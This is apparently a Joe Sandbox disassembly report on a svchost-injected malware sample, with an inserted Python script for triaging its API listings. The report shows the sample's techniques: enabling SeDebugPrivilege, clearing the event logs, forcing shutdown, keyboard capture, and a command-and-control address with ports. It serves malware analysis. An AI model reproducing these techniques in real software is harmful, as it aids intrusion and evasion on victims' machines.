                                                                                                              • DirectInput8Create.DINPUT8(?,00000800,04E15934,04E21220,00000000,?,04DF6078,?,?), ref: 04DFE602
                                                                                                              • GetTickCount.KERNEL32 ref: 04DFE6B5
                                                                                                              • GetKeyState.USER32(00000014), ref: 04DFE6C2
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateFile$Mutex$CloseCountDeleteDirectFolderHandleInput8ObjectPathReleaseSingleSizeStateTickWaitlstrcat
                                                                                                              • String ID: <$\DisplaySessionContainers.log
                                                                                                              • API String ID: 1095970075-1170057892
                                                                                                              APIs
                                                                                                              • GetCurrentProcess.KERNEL32(00000020,?,?,?,?,?,?,?,?,04DFDFF4), ref: 04DF7687
                                                                                                              • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,04DFDFF4), ref: 04DF768E
                                                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 04DF76AA
                                                                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 04DF76C7
                                                                                                              • CloseHandle.KERNEL32(?), ref: 04DF76D1
                                                                                                              • GetModuleHandleA.KERNEL32(NtDll.dll,NtSetInformationProcess,?,?,?,?,?,?,?,04DFDFF4), ref: 04DF76E1
                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 04DF76E8
                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 04DF770A
                                                                                                              • OpenProcess.KERNEL32(001FFFFF,00000000,00000000), ref: 04DF7717
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Process$CurrentHandleOpenToken$AddressAdjustCloseLookupModulePrivilegePrivilegesProcValue
                                                                                                              • String ID: NtDll.dll$NtSetInformationProcess$SeDebugPrivilege
                                                                                                              • API String ID: 1802016953-1577477132
                                                                                                              APIs
                                                                                                              • VirtualQuery.KERNEL32(?,?,0000001C), ref: 04E005C4
                                                                                                              • GetSystemInfo.KERNEL32(?), ref: 04E005DC
                                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 04E005EC
                                                                                                              • GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 04E005FC
                                                                                                              • VirtualAlloc.KERNEL32(?,-00000001,00001000,00000004), ref: 04E0064E
                                                                                                              • VirtualProtect.KERNEL32(?,-00000001,00000104,?), ref: 04E00663
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Virtual$AddressAllocHandleInfoModuleProcProtectQuerySystem
                                                                                                              • String ID: SetThreadStackGuarantee$kernel32.dll
                                                                                                              • API String ID: 3290314748-423161677
                                                                                                              APIs
                                                                                                              • OpenEventLogW.ADVAPI32(00000000,04E168EC), ref: 04DFB437
                                                                                                              • ClearEventLogW.ADVAPI32(00000000,00000000), ref: 04DFB442
                                                                                                              • CloseEventLog.ADVAPI32(00000000), ref: 04DFB449
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Event$ClearCloseOpen
                                                                                                              • String ID: Application$Security$System
                                                                                                              • API String ID: 1391105993-2169399579
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3349974011.0000000004C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4c70000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: swprintf$_memset
                                                                                                              • String ID: :$@
                                                                                                              • API String ID: 1292703666-1367939426
                                                                                                              • Opcode ID: c41eee5bca564820e5e03cfe4b5e61b08d4c1815b016d4427b1dccbe98d26b42
                                                                                                              • Instruction ID: a3f4dc1fe36ec3a17d71050748eccff395bc151401e06da41a43f284dc7badcf
                                                                                                              • Opcode Fuzzy Hash: c41eee5bca564820e5e03cfe4b5e61b08d4c1815b016d4427b1dccbe98d26b42
                                                                                                              • Instruction Fuzzy Hash: E6315EB6D0021C9BDB14DFE5CC85FEEB7B9FB48700F50821DE906A7241EA746905CB90
                                                                                                              APIs
                                                                                                              • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,?,?,?,?,04DF794C), ref: 04DF77A6
                                                                                                              • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,04DF794C,?,?,?,?,?,?,75920630), ref: 04DF77AD
                                                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 04DF77D5
                                                                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 04DF7809
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
                                                                                                              • String ID: SeDebugPrivilege
                                                                                                              • API String ID: 2349140579-2896544425
                                                                                                              • Opcode ID: 3facf00bbf6e56b63c2538cb16a311d5a79c6aa5172c8a5b27992f15bfd5b40e
                                                                                                              • Instruction ID: d0a3d3eb100df07b212f2036fad2f2f7fe1cb5b41a293fbda83f7527efeab88c
                                                                                                              • Opcode Fuzzy Hash: 3facf00bbf6e56b63c2538cb16a311d5a79c6aa5172c8a5b27992f15bfd5b40e
                                                                                                              • Instruction Fuzzy Hash: 26116571B40208ABEF14DFE5DC45BFEB7B4FF08705F104159EA05A7290DA79A9058B60
                                                                                                              APIs
                                                                                                              • IsDebuggerPresent.KERNEL32 ref: 02587A1D
                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 02587A32
                                                                                                              • UnhandledExceptionFilter.KERNEL32(02595330), ref: 02587A3D
                                                                                                              • GetCurrentProcess.KERNEL32(C0000409), ref: 02587A59
                                                                                                              • TerminateProcess.KERNEL32(00000000), ref: 02587A60
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                              • String ID:
                                                                                                              • API String ID: 2579439406-0
                                                                                                              • Opcode ID: 3ac78018059ca4fa38e7b038d3074f43b95ada5ff0eda8a773cb443795434f63
                                                                                                              • Instruction ID: 75c35461681e58b57338d2e8c07beefa158301fd6b3c0eff6f6e81b018f71e4c
                                                                                                              • Opcode Fuzzy Hash: 3ac78018059ca4fa38e7b038d3074f43b95ada5ff0eda8a773cb443795434f63
                                                                                                              • Instruction Fuzzy Hash: 1A21EFB8C94200EFD702DF69F1496183BA5FB48345F92181AF5089B340EBB455A8FF2C
                                                                                                              APIs
                                                                                                                • Part of subcall function 04DF7BC0: GetCurrentProcess.KERNEL32(00000028,?), ref: 04DF7BD9
                                                                                                                • Part of subcall function 04DF7BC0: OpenProcessToken.ADVAPI32(00000000), ref: 04DF7BE0
                                                                                                                • Part of subcall function 04DF7BC0: LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 04DF7C06
                                                                                                                • Part of subcall function 04DF7BC0: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 04DF7C1C
                                                                                                                • Part of subcall function 04DF7BC0: GetLastError.KERNEL32 ref: 04DF7C22
                                                                                                                • Part of subcall function 04DF7BC0: CloseHandle.KERNEL32(?), ref: 04DF7C30
                                                                                                              • ExitWindowsEx.USER32(00000006,00000000), ref: 04DFB49D
                                                                                                                • Part of subcall function 04DF7BC0: CloseHandle.KERNEL32(?), ref: 04DF7C4B
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CloseHandleProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                                              • String ID:
                                                                                                              • API String ID: 681424410-0
                                                                                                              • Opcode ID: e387395e7c1b1b0f35d4d93f4ca1c4db6a6ec2a72029c14fff6c6176e3fe0f38
                                                                                                              • Instruction ID: dd5be4a230dfa22489e31390e95d96a1e800244e0b9e1db1ed676a9eb2aa9043
                                                                                                              • Opcode Fuzzy Hash: e387395e7c1b1b0f35d4d93f4ca1c4db6a6ec2a72029c14fff6c6176e3fe0f38
                                                                                                              • Instruction Fuzzy Hash: 2FC08C3238010002F26436A57C22BAAB340DB85322F01802BAB0A880C18D57A42081B9
                                                                                                              APIs
                                                                                                                • Part of subcall function 04DF7BC0: GetCurrentProcess.KERNEL32(00000028,?), ref: 04DF7BD9
                                                                                                                • Part of subcall function 04DF7BC0: OpenProcessToken.ADVAPI32(00000000), ref: 04DF7BE0
                                                                                                                • Part of subcall function 04DF7BC0: LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 04DF7C06
                                                                                                                • Part of subcall function 04DF7BC0: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 04DF7C1C
                                                                                                                • Part of subcall function 04DF7BC0: GetLastError.KERNEL32 ref: 04DF7C22
                                                                                                                • Part of subcall function 04DF7BC0: CloseHandle.KERNEL32(?), ref: 04DF7C30
                                                                                                              • ExitWindowsEx.USER32(00000005,00000000), ref: 04DFB4C1
                                                                                                                • Part of subcall function 04DF7BC0: CloseHandle.KERNEL32(?), ref: 04DF7C4B
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CloseHandleProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                                              • String ID:
                                                                                                              • API String ID: 681424410-0
                                                                                                              • Opcode ID: 867e95ab017bb3dd6419d828e85f1335a8c2ee9c739d641e2bbd771fd2112269
                                                                                                              • Instruction ID: 743a1e30bb6a9652611f1dbf20eae36b0d07fb6495af7248be78519ac8b0d364
                                                                                                              • Opcode Fuzzy Hash: 867e95ab017bb3dd6419d828e85f1335a8c2ee9c739d641e2bbd771fd2112269
                                                                                                              • Instruction Fuzzy Hash: DCC08C3238010002F26436A57C22BAAB340DB85323F02802BAB0A880C18D56A41081B9
                                                                                                              APIs
                                                                                                                • Part of subcall function 04DF7BC0: GetCurrentProcess.KERNEL32(00000028,?), ref: 04DF7BD9
                                                                                                                • Part of subcall function 04DF7BC0: OpenProcessToken.ADVAPI32(00000000), ref: 04DF7BE0
                                                                                                                • Part of subcall function 04DF7BC0: LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 04DF7C06
                                                                                                                • Part of subcall function 04DF7BC0: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 04DF7C1C
                                                                                                                • Part of subcall function 04DF7BC0: GetLastError.KERNEL32 ref: 04DF7C22
                                                                                                                • Part of subcall function 04DF7BC0: CloseHandle.KERNEL32(?), ref: 04DF7C30
                                                                                                              • ExitWindowsEx.USER32(00000004,00000000), ref: 04DFB479
                                                                                                                • Part of subcall function 04DF7BC0: CloseHandle.KERNEL32(?), ref: 04DF7C4B
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CloseHandleProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                                              • String ID:
                                                                                                              • API String ID: 681424410-0
                                                                                                              • Opcode ID: 03b4760767a3c0c8bb4188f8b3b8de856581b98afc6a6d917a9e5ecd47aa0a51
                                                                                                              • Instruction ID: 36c1bf366572b104723cefe4bd7b9fb62427c9ae955971f9fd233b0d5ab017ff
                                                                                                              • Opcode Fuzzy Hash: 03b4760767a3c0c8bb4188f8b3b8de856581b98afc6a6d917a9e5ecd47aa0a51
                                                                                                              • Instruction Fuzzy Hash: 77C08C3238010006F26437A57C22BA9B340DB85322F01802BAB0A880C18D66A41081B9
                                                                                                              APIs
                                                                                                                • Part of subcall function 04DFF757: _malloc.LIBCMT ref: 04DFF771
                                                                                                              • RegOpenKeyExW.ADVAPI32(80000001,Console,00000000,00000002,?), ref: 04DFB5D6
                                                                                                              • RegDeleteValueW.ADVAPI32(?,IpDate), ref: 04DFB5E6
                                                                                                              • RegSetValueExW.ADVAPI32(?,IpDate,00000000,00000003,00000002,?), ref: 04DFB603
                                                                                                              • _memset.LIBCMT ref: 04DFB624
                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 04DFB66B
                                                                                                              • _memset.LIBCMT ref: 04DFB68C
                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 04DFB77C
                                                                                                              • Sleep.KERNEL32(000007D0), ref: 04DFB787
                                                                                                                • Part of subcall function 04DFF757: std::exception::exception.LIBCMT ref: 04DFF7A6
                                                                                                                • Part of subcall function 04DFF757: std::exception::exception.LIBCMT ref: 04DFF7C0
                                                                                                                • Part of subcall function 04DFF757: __CxxThrowException@8.LIBCMT ref: 04DFF7D1
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CloseValue_memsetstd::exception::exception$DeleteException@8OpenSleepThrow_malloc
                                                                                                              • String ID: 127.0.0.1$47.239.116.158$47.239.116.158$6666$8888$Console$IpDate$o1:$o2:$o3:$p1:$p2:$p3:$t1:$t2:$t3:
                                                                                                              • API String ID: 1186799303-2669174398
                                                                                                              • Opcode ID: 45c9bf8bbfb20d8c9b1fc2850bc87572735d9d14bc779bb41ab3b5e76775f7fc
                                                                                                              • Instruction ID: 178b6628ac7393d5788171086a413c5adf2afc505689a662448c69d3ec9b4b4a
                                                                                                              • Opcode Fuzzy Hash: 45c9bf8bbfb20d8c9b1fc2850bc87572735d9d14bc779bb41ab3b5e76775f7fc
                                                                                                              • Instruction Fuzzy Hash: 1741E231BC03007BF624BB24AC47F1A7354DF44B05F055125FF08BA292D7A5B9458ABB
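The listings above (the SeDebugPrivilege function, the three ExitWindowsEx functions, the IsDebuggerPresent/TerminateProcess function and the HKCU\Console\IpDate write) all use one line format. The following Python is an added example, not code from the Joe Sandbox report or from the sample: it parses that format into structured calls and decodes the constants a triager would otherwise look up by hand. It turns the ExitWindowsEx arguments 6, 5 and 4 into EWX_* flag names, resolves the registry hive and value type, ties AdjustTokenPrivileges to the privilege named in the preceding LookupPrivilegeValueW, and recognises the IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, TerminateProcess sequence with 0xC0000409 (STATUS_STACK_BUFFER_OVERRUN) on the stack as the MSVC CRT's __raise_securityfailure (/GS cookie failure path) rather than an anti-debug check. The constant values are from the Windows SDK; the per-function input text is copied from this page, and the dictionary keys (first ref address of each listing) and the finding wording are the example's own choices.

```python
"""Structured view of the "APIs" listings in a Joe Sandbox IDA-plugin report.

Added example; not code from Joe Sandbox or from the sample. The listing
text below is copied from this report, and the decoders know only the
Win32 constants that appear in it (values taken from the Windows SDK)."""
import re
from dataclasses import dataclass
from typing import Optional

# [• ][Part of subcall function XXXX: ]Api.MODULE[(arg,arg,...)][,] ref: ADDR
LINE_RE = re.compile(
    r"^\s*(?:•\s*)?(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_][\w@:]*)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

@dataclass
class Call:
    api: str
    module: str
    args: list
    ref: str
    subcall_of: Optional[str] = None   # set for "Part of subcall function" lines

def parse_listing(text: str) -> list:
    """Parse one function's listing; label lines (APIs, Strings, ...) are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            args = m["args"].split(",") if m["args"] else []
            calls.append(Call(m["api"], m["mod"].upper(), args, m["ref"].upper(), m["sub"]))
    return calls

# Windows SDK values (winuser.h, winreg.h, winnt.h).
EWX = {0x1: "EWX_SHUTDOWN", 0x2: "EWX_REBOOT", 0x4: "EWX_FORCE",
       0x8: "EWX_POWEROFF", 0x10: "EWX_FORCEIFHUNG"}
HIVES = {0x80000000: "HKCR", 0x80000001: "HKCU", 0x80000002: "HKLM", 0x80000003: "HKU"}
REG_TYPES = {1: "REG_SZ", 2: "REG_EXPAND_SZ", 3: "REG_BINARY", 4: "REG_DWORD", 7: "REG_MULTI_SZ"}

def decode_exitwindows(flags: int) -> str:
    """uFlags of ExitWindowsEx; EWX_LOGOFF is 0 and implied when no shutdown bit is set."""
    names = [n for bit, n in EWX.items() if flags & bit]
    if not flags & (0x1 | 0x2 | 0x8):
        names.insert(0, "EWX_LOGOFF")
    return "|".join(names)

def triage(calls: list) -> list:
    """Turn a parsed listing into short findings a reviewer can act on."""
    findings, privilege = [], None
    for c in calls:
        if c.api == "LookupPrivilegeValueW" and len(c.args) > 1:
            privilege = c.args[1]                     # name passed to the lookup
        elif c.api == "AdjustTokenPrivileges" and privilege:
            findings.append(f"enables {privilege} on own token @{c.ref}")
        elif c.api == "ExitWindowsEx":
            findings.append(f"ExitWindowsEx({decode_exitwindows(int(c.args[0], 16))}) @{c.ref}")
        elif c.api == "RegOpenKeyExW":
            findings.append(f"opens {HIVES.get(int(c.args[0], 16), c.args[0])}\\{c.args[1]} @{c.ref}")
        elif c.api == "RegSetValueExW":
            findings.append(f"writes value {c.args[1]} as {REG_TYPES.get(int(c.args[3], 16), c.args[3])} @{c.ref}")
    # IsDebuggerPresent -> SetUnhandledExceptionFilter -> UnhandledExceptionFilter -> TerminateProcess
    # with STATUS_STACK_BUFFER_OVERRUN (0xC0000409) on the stack is the MSVC CRT's
    # __raise_securityfailure (the /GS cookie failure path), not an anti-debug check.
    gs = ["IsDebuggerPresent", "SetUnhandledExceptionFilter", "UnhandledExceptionFilter", "TerminateProcess"]
    if [c.api for c in calls if c.api in gs] == gs and any("C0000409" in c.args for c in calls):
        findings.append("CRT __raise_securityfailure: IsDebuggerPresent here is not anti-debug")
    return findings

# Constructed input: listing lines copied from this report, keyed by first ref address.
LISTINGS = {
    "04DF77A6": """
• GetCurrentProcess.KERNEL32(00000028,?,?,?,?,?,?,?,?,04DF794C), ref: 04DF77A6
• OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,04DF794C,?,?,?,?,?,?,75920630), ref: 04DF77AD
• LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 04DF77D5
• AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 04DF7809
""",
    "04DFB49D": """
  • Part of subcall function 04DF7BC0: LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 04DF7C06
  • Part of subcall function 04DF7BC0: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 04DF7C1C
• ExitWindowsEx.USER32(00000006,00000000), ref: 04DFB49D
""",
    "02587A1D": """
• IsDebuggerPresent.KERNEL32 ref: 02587A1D
• SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 02587A32
• UnhandledExceptionFilter.KERNEL32(02595330), ref: 02587A3D
• GetCurrentProcess.KERNEL32(C0000409), ref: 02587A59
• TerminateProcess.KERNEL32(00000000), ref: 02587A60
""",
    "04DFB5D6": """
• RegOpenKeyExW.ADVAPI32(80000001,Console,00000000,00000002,?), ref: 04DFB5D6
• RegDeleteValueW.ADVAPI32(?,IpDate), ref: 04DFB5E6
• RegSetValueExW.ADVAPI32(?,IpDate,00000000,00000003,00000002,?), ref: 04DFB603
""",
}

def summarize(listings: dict = LISTINGS) -> dict:
    """Findings per listing, e.g. '04DFB49D' -> ExitWindowsEx(EWX_REBOOT|EWX_FORCE)."""
    return {name: triage(parse_listing(text)) for name, text in listings.items()}

if __name__ == "__main__":
    for name, findings in summarize().items():
        print(name, *findings, sep="\n    ")
```

Run stand-alone it prints one block per listing; the same rules applied to the other two ExitWindowsEx functions give EWX_SHUTDOWN|EWX_FORCE (5) and EWX_LOGOFF|EWX_FORCE (4), which together with the reboot variant are the three host-control commands behind the SeShutdownPrivilege subcall. The triage table is deliberately small; add entries for further APIs in the report as needed.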
                                                                                                              APIs
                                                                                                              • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,025876C2,02597AE0,00000008,02587856,?,?,?,02597B00,0000000C,02587911,?), ref: 02589B3A
                                                                                                              • __mtterm.LIBCMT ref: 02589B46
                                                                                                                • Part of subcall function 02589811: DecodePointer.KERNEL32(00000005,02587785,0258776B,02597AE0,00000008,02587856,?,?,?,02597B00,0000000C,02587911,?), ref: 02589822
                                                                                                                • Part of subcall function 02589811: TlsFree.KERNEL32(00000005,02587785,0258776B,02597AE0,00000008,02587856,?,?,?,02597B00,0000000C,02587911,?), ref: 0258983C
                                                                                                                • Part of subcall function 02589811: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,02587785,0258776B,02597AE0,00000008,02587856,?,?,?,02597B00,0000000C,02587911,?), ref: 0258C125
                                                                                                                • Part of subcall function 02589811: _free.LIBCMT ref: 0258C128
                                                                                                                • Part of subcall function 02589811: DeleteCriticalSection.KERNEL32(00000005,?,?,02587785,0258776B,02597AE0,00000008,02587856,?,?,?,02597B00,0000000C,02587911,?), ref: 0258C14F
                                                                                                              • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 02589B5C
                                                                                                              • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 02589B69
                                                                                                              • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 02589B76
                                                                                                              • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 02589B83
                                                                                                              • TlsAlloc.KERNEL32(?,?,025876C2,02597AE0,00000008,02587856,?,?,?,02597B00,0000000C,02587911,?), ref: 02589BD3
                                                                                                              • TlsSetValue.KERNEL32(00000000,?,?,025876C2,02597AE0,00000008,02587856,?,?,?,02597B00,0000000C,02587911,?), ref: 02589BEE
                                                                                                              • __init_pointers.LIBCMT ref: 02589BF8
                                                                                                              • EncodePointer.KERNEL32(?,?,025876C2,02597AE0,00000008,02587856,?,?,?,02597B00,0000000C,02587911,?), ref: 02589C09
                                                                                                              • EncodePointer.KERNEL32(?,?,025876C2,02597AE0,00000008,02587856,?,?,?,02597B00,0000000C,02587911,?), ref: 02589C16
                                                                                                              • EncodePointer.KERNEL32(?,?,025876C2,02597AE0,00000008,02587856,?,?,?,02597B00,0000000C,02587911,?), ref: 02589C23
                                                                                                              • EncodePointer.KERNEL32(?,?,025876C2,02597AE0,00000008,02587856,?,?,?,02597B00,0000000C,02587911,?), ref: 02589C30
                                                                                                              • DecodePointer.KERNEL32(Function_00009995,?,?,025876C2,02597AE0,00000008,02587856,?,?,?,02597B00,0000000C,02587911,?), ref: 02589C51
                                                                                                              • __calloc_crt.LIBCMT ref: 02589C66
                                                                                                              • DecodePointer.KERNEL32(00000000,?,?,025876C2,02597AE0,00000008,02587856,?,?,?,02597B00,0000000C,02587911,?), ref: 02589C80
                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 02589C92
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                                                                              • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                              • API String ID: 3698121176-3819984048
                                                                                                              • Opcode ID: 8e129e1279e194cdaf1ac0bbcc247717d447758556963f371c6909b068625a9b
                                                                                                              • Instruction ID: 2c93c5cc2b0a0d5ea330efa5abf001d64e184c945be317e7c620546fd5798fb7
                                                                                                              • Opcode Fuzzy Hash: 8e129e1279e194cdaf1ac0bbcc247717d447758556963f371c6909b068625a9b
                                                                                                              • Instruction Fuzzy Hash: D0316070D802019FEB21EF75F8086293FE6BB44768756191AD400E2250FBB28829FF5E
APIs
• GdipGetImagePixelFormat.GDIPLUS(Function_00009A80,?,?,00000000), ref: 04DF9ECB
• GdipGetImageHeight.GDIPLUS(Function_00009A80,?,?,00000000), ref: 04DF9F4C
• GdipGetImageWidth.GDIPLUS(Function_00009A80,?,?,00000000), ref: 04DF9F74
• GdipGetImagePaletteSize.GDIPLUS(Function_00009A80,?,?,00000000), ref: 04DF9FCF
• _malloc.LIBCMT ref: 04DFA010
  • Part of subcall function 04DFF6C3: __FF_MSGBANNER.LIBCMT ref: 04DFF6DC
  • Part of subcall function 04DFF6C3: __NMSG_WRITE.LIBCMT ref: 04DFF6E3
  • Part of subcall function 04DFF6C3: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,04E04550,00000000,00000001,00000000,?,04E08E36,00000018,04E17468,0000000C,04E08EC6), ref: 04DFF708
• _free.LIBCMT ref: 04DFA050
• GdipGetImagePalette.GDIPLUS(?,00000008,?,?,00000000), ref: 04DFA078
• SetDIBColorTable.GDI32(?,00000000,?,?,?,00000000), ref: 04DFA107
• GdipBitmapLockBits.GDIPLUS(Function_00009A80,?,00000001,?,?,?,00000000), ref: 04DFA162
• _free.LIBCMT ref: 04DFA184
• _memcpy_s.LIBCMT ref: 04DFA1D3
• GdipBitmapUnlockBits.GDIPLUS(?,?,?,00000000), ref: 04DFA220
• GdipCreateBitmapFromScan0.GDIPLUS(?,?,04E16AA0,00022009,?,00000000,?,00000000), ref: 04DFA27C
• GdipGetImageGraphicsContext.GDIPLUS(00000000,00022009,?,00000000), ref: 04DFA29C
• GdipDrawImageI.GDIPLUS(00000000,Function_00009A80,00000000,00000000,?,00000000), ref: 04DFA2B7
• GdipDeleteGraphics.GDIPLUS(?,?,00000000), ref: 04DFA2C4
• GdipDisposeImage.GDIPLUS(00000000,?,00000000), ref: 04DFA2CB
• _free.LIBCMT ref: 04DFA2E6
Strings
